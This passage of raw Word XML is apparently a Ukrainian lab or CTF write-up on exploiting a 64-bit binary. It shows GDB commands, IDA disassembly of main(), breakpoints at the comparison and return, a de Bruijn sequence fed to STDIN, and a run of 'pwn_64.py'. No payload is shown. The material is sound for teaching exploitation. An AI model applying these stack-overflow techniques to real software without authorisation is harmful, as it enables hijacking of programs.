        </w:rPr>
        <w:t>DWORD:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0029139E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>10w</w:t>
      </w:r>
      <w:r w:rsidRPr="0029139E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x $esp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03ED965F" w14:textId="77777777" w:rsidR="0021684A" w:rsidRDefault="0021684A" w:rsidP="0021684A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QWORD:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006653C2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>30</w:t>
      </w:r>
      <w:r w:rsidRPr="006653C2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gx $rsp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAE6A9E" w14:textId="77777777" w:rsidR="0021684A" w:rsidRDefault="0021684A" w:rsidP="0021684A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Next instruction:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>si (stepi)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9FF06C" w14:textId="7F9FC3DE" w:rsidR="0021684A" w:rsidRDefault="0021684A" w:rsidP="0021684A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Syscall numbers</w:t>
      </w:r>
      <w:r w:rsidR="009017CF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:anchor="x86-32_bit" w:history="1">
        <w:r w:rsidR="009017CF" w:rsidRPr="00F65FCF">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>x32</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="009017CF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> an</w:t>
      </w:r>
      <w:r w:rsidR="000F3E8C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">d </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:anchor="x86_64-64_bit" w:history="1">
        <w:r w:rsidR="000F3E8C" w:rsidRPr="003479D5">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>x64</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00F744D0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EFBAB2" w14:textId="77777777" w:rsidR="00686154" w:rsidRDefault="00686154" w:rsidP="001D731D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="246CBB3F" w14:textId="77777777" w:rsidR="00686154" w:rsidRDefault="00686154" w:rsidP="001D731D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62A70701" w14:textId="6F29A902" w:rsidR="00B709CF" w:rsidRDefault="00B709CF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="747B3FED" w14:textId="7E93FE38" w:rsidR="003856D1" w:rsidRDefault="0025602A" w:rsidP="00036FEB">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>64</w:t>
      </w:r>
      <w:r w:rsidR="00B31522">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="006D3965">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B13959" w14:textId="659B86FC" w:rsidR="00036FEB" w:rsidRDefault="00E31E0A" w:rsidP="00036FEB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Визначимо </w:t>
      </w:r>
      <w:r w:rsidR="00B83F73">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>формат</w:t>
      </w:r>
      <w:r w:rsidR="003B2B4F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> та розрядн</w:t>
      </w:r>
      <w:r w:rsidR="00AD1143">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ість</w:t>
      </w:r>
      <w:r w:rsidR="009D40EA">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009828FB">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">виконуваного </w:t>
      </w:r>
      <w:r w:rsidR="009D40EA">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>файлу</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65068B7F" w14:textId="6BC11925" w:rsidR="00E31E0A" w:rsidRDefault="00607A2E" w:rsidP="00036FEB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69EEA3A3" wp14:editId="4D22348F">
            <wp:extent cx="6645910" cy="2639695"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="414680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80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A81D" w14:textId="77777777" w:rsidR="00BC05ED" w:rsidRDefault="00BC05ED" w:rsidP="00036FEB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72FE4BA3" w14:textId="0F346A2A" w:rsidR="001038DA" w:rsidRPr="001038DA" w:rsidRDefault="001038DA" w:rsidP="00036FEB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Запустимо програму і побачимо </w:t>
      </w:r>
      <w:r w:rsidR="00E2440F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>рядок</w:t>
      </w:r>
      <w:r w:rsidR="00BB4C20">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BB4C20" w:rsidRPr="0023506E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="00BB4C20">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Knock</w:t>
      </w:r>
      <w:r w:rsidR="00BB4C20" w:rsidRPr="0023506E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00BB4C20">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>knock</w:t>
      </w:r>
      <w:r w:rsidR="00BB4C20" w:rsidRPr="0023506E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00BB4C20">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Neo</w:t>
      </w:r>
      <w:r w:rsidR="00D4003F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BB4C20" w:rsidRPr="0023506E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">" </w:t>
      </w:r>
      <w:r w:rsidR="00BB4C20">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">та </w:t>
      </w:r>
      <w:r w:rsidR="00802993">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">очікування </w:t>
      </w:r>
      <w:r w:rsidR="00BB4C20">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>вв</w:t>
      </w:r>
      <w:r w:rsidR="00802993">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidR="00BB4C20">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>д</w:t>
      </w:r>
      <w:r w:rsidR="00802993">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>у</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BD756A" w14:textId="5703C6A3" w:rsidR="001038DA" w:rsidRPr="001038DA" w:rsidRDefault="001038DA" w:rsidP="00036FEB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46E82DDC" wp14:editId="5434382C">
            <wp:extent cx="6542857" cy="704762"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="1828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399" w14:textId="77777777" w:rsidR="0087728A" w:rsidRPr="00607A2E" w:rsidRDefault="0087728A" w:rsidP="001D731D"/>
    <w:p w14:paraId="2C5C076D" w14:textId="1BD136AA" w:rsidR="0023506E" w:rsidRDefault="0023506E" w:rsidP="001D731D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Дизасемблюємо програму в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IDA</w:t>
      </w:r>
      <w:r w:rsidRPr="0023506E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>та знайдемо цей рядок:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09662F83" w14:textId="1CEE4EFF" w:rsidR="00B90A6F" w:rsidRPr="0023506E" w:rsidRDefault="00B90A6F" w:rsidP="001D731D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D593FCF" wp14:editId="3ACB593C">
            <wp:extent cx="6645910" cy="3114040"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="119650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01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90C0" w14:textId="77777777" w:rsidR="000317FD" w:rsidRDefault="007B2624" w:rsidP="001D731D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00221DB7">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Бачимо структуру</w:t>
      </w:r>
      <w:r w:rsidR="003A3009" w:rsidRPr="00221DB7">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> ф. </w:t>
      </w:r>
      <w:r w:rsidR="003A3009">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r w:rsidR="003A3009" w:rsidRPr="00221DB7">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidR="003A3009">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F8C3E7" w14:textId="77777777" w:rsidR="00101138" w:rsidRDefault="000317FD" w:rsidP="001D731D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>1) В</w:t>
      </w:r>
      <w:r w:rsidR="003A3009">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">ивід рядка </w:t>
      </w:r>
      <w:r w:rsidR="00221DB7" w:rsidRPr="0023506E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="00221DB7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Knock</w:t>
      </w:r>
      <w:r w:rsidR="00221DB7" w:rsidRPr="0023506E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00221DB7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>knock</w:t>
      </w:r>
      <w:r w:rsidR="00221DB7" w:rsidRPr="0023506E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00221DB7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Neo</w:t>
      </w:r>
      <w:r w:rsidR="00221DB7">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00221DB7" w:rsidRPr="0023506E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB0CB63" w14:textId="77777777" w:rsidR="007B7371" w:rsidRPr="0020327F" w:rsidRDefault="00101138" w:rsidP="001D731D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">2) </w:t>
      </w:r>
      <w:r w:rsidRPr="007B7371">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>З</w:t>
      </w:r>
      <w:r w:rsidR="00221DB7">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>читування вводу</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C27C851" w14:textId="6223317D" w:rsidR="00D33FAC" w:rsidRPr="003A5C43" w:rsidRDefault="007B7371" w:rsidP="001D731D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">3) </w:t>
      </w:r>
      <w:r w:rsidRPr="007B7371">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>П</w:t>
      </w:r>
      <w:r w:rsidR="001E60F4">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">орівняння </w:t>
      </w:r>
      <w:r w:rsidR="00D33FAC" w:rsidRPr="003A5C43">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="00D33FAC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cmp</w:t>
      </w:r>
      <w:r w:rsidR="00D33FAC" w:rsidRPr="003A5C43">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D33FAC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>eax</w:t>
      </w:r>
      <w:r w:rsidR="00D33FAC" w:rsidRPr="003A5C43">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>, 0</w:t>
      </w:r>
      <w:r w:rsidR="00D33FAC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00D33FAC" w:rsidRPr="003A5C43">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>539"</w:t>
      </w:r>
      <w:r w:rsidR="0016013E" w:rsidRPr="003A5C43">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="0016013E" w:rsidRPr="003A5C43">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="003A5C43" w:rsidRPr="003A5C43">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="003A5C43">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="0016013E" w:rsidRPr="003A5C43">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>401</w:t>
      </w:r>
      <w:r w:rsidR="003A5C43">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>eff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B02D65" w14:textId="24DBB3C0" w:rsidR="00CB68D9" w:rsidRPr="009035C3" w:rsidRDefault="007B7371" w:rsidP="001D731D">
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">4) Повернення з функції </w:t>
      </w:r>
      <w:r w:rsidRPr="003A5C43">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ret</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5C43">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="006D7E4B" w:rsidRPr="003A5C43">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="006D7E4B" w:rsidRPr="003A5C43">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="006B1C85" w:rsidRPr="00A46459">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00A46459" w:rsidRPr="00A46459">
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00A46459">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00A46459" w:rsidRPr="00A46459">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>401</w:t>
      </w:r>
      <w:r w:rsidR="00A46459">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidR="00A46459" w:rsidRPr="00A46459">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00A46459" w:rsidRPr="009035C3">
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2974E850" w14:textId="77777777" w:rsidR="006D7E4B" w:rsidRPr="003A5C43" w:rsidRDefault="006D7E4B" w:rsidP="001D731D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20234451" w14:textId="65980308" w:rsidR="00B43B9F" w:rsidRPr="00C046B4" w:rsidRDefault="00B43B9F" w:rsidP="001D731D">
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Тепер можемо поставити </w:t>
      </w:r>
      <w:r w:rsidR="00820418">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>брейкпоінт</w:t>
      </w:r>
      <w:r w:rsidR="00D02598">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> на цих адресах</w:t>
      </w:r>
      <w:r w:rsidR="00F372FF" w:rsidRPr="00F372FF">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAB8459" w14:textId="5D3A8541" w:rsidR="00C046B4" w:rsidRPr="0066385E" w:rsidRDefault="004278C2" w:rsidP="001D731D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>br</w:t>
      </w:r>
      <w:r w:rsidRPr="004278C2">
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:r w:rsidRPr="003A5C43">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5C43">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>401</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>eff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC9A727" w14:textId="44DF8721" w:rsidR="00C046B4" w:rsidRDefault="004278C2" w:rsidP="001D731D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">br* </w:t>
      </w:r>
      <w:r w:rsidRPr="00A46459">
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00A46459">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>401</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="00A46459">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32977312" w14:textId="18752C5D" w:rsidR="004278C2" w:rsidRDefault="00C320F5" w:rsidP="001D731D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6233B4D7" wp14:editId="74AD79C3">
            <wp:extent cx="5285714" cy="1247619"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="203676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68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D3BE" w14:textId="1DF84891" w:rsidR="00C046B4" w:rsidRPr="008060F7" w:rsidRDefault="00275178" w:rsidP="001D731D">
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>П</w:t>
      </w:r>
      <w:r w:rsidR="00C046B4">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>родебажи</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>мо</w:t>
      </w:r>
      <w:r w:rsidR="00C046B4">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r w:rsidR="00C046B4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GDB</w:t>
      </w:r>
      <w:r w:rsidR="00F0187D" w:rsidRPr="008060F7">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00F0187D">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> записавши послідовність де Брейна в </w:t>
      </w:r>
      <w:r w:rsidR="00F0187D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>STDIN</w:t>
      </w:r>
      <w:r w:rsidR="001532CF" w:rsidRPr="008060F7">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8889B7" w14:textId="415B670B" w:rsidR="006E7C72" w:rsidRPr="007134A9" w:rsidRDefault="006E7C72" w:rsidP="007134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6E7C72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6E7C72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E7C72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5000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p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E7C7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6E7C7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2BE50C9D" w14:textId="003062E7" w:rsidR="00730A07" w:rsidRDefault="00D11184" w:rsidP="001D731D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidRPr="00D11184">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>python3 pwn_64.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380CB023" w14:textId="77777777" w:rsidR="00AD67C4" w:rsidRDefault="00AD67C4" w:rsidP="001D731D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F643B8F" w14:textId="2507D1E9" w:rsidR="00BB29BF" w:rsidRPr="00AD67C4" w:rsidRDefault="00847668" w:rsidP="001D731D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Перш</w:t>
      </w:r>
      <w:r w:rsidR="0043419B">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ий брейкпо</w:t>
      </w:r>
      <w:r w:rsidR="00DE6292">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>і</w:t>
      </w:r>
      <w:r w:rsidR="0043419B">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>нт</w:t>
      </w:r>
      <w:r w:rsidR="00DD729D">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>. Бачимо</w:t>
      </w:r>
      <w:r w:rsidR="004C7BFD">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
